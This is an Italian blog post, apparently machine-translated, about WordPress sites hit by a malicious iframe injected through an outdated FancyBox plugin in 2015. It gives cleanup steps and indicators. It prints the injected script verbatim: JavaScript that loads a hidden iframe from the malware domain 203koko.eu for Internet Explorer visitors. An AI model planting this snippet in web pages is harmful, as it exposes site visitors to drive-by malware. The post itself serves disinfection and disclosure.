[Malware iframe 203koko] Siti web WordPress Malware infetto

All'inizio di questa settimana una serie di siti web e blog WordPress, ha ricevuto avvisi da infezione da malware attraverso Google Webmaster.

Il problema che Google Webmaster di cui è la presenza di un codice / copione malware iframe la pagina web sorgente.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Sembra che sia un vulnerabilità a plug-inacquis FancyBox per WordPress fino a ieri (05.02.2015) non era stato aggiornato per lungo tempo.
La soluzione di questo problema e disinfezione virus siti con questo malware, è relativamente semplice.
1. Disabilita il plugin FancyBox.
2. Elimina tutti i file di plugin FancyBox dal server (tramite FTP)
3. Installa la nuova versione del plugin (Fancybox 3.0.4)

FancyBox per WordPress 3.0.4

- Rinominata l'impostazione interessata dal problema di sicurezza menzionato in 3.0.3. Ciò dovrebbe impedire la visualizzazione del codice dannoso sui siti in cui si trova il plug-in updated senza rimuovere il codice dannoso.

FancyBox per WordPress 3.0.3

Risolto un problema di sicurezza.

Informazioni sul malware: 

TIPO: Iframe reindirizzamento
TARGET: WordPress Scatola fantasia
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODICI:
MALWARE SCRITTO: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Rimuovi il malware dal tuo WordPress sito web.

Fondatore ed editore Stealth Settings, dal 2006 ad oggi. Esperienza sui sistemi operativi Linux (Specialmente CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CSM).

Come » Google » [Malware iframe 203koko] Siti web WordPress Malware infetto
Lascia un tuo commento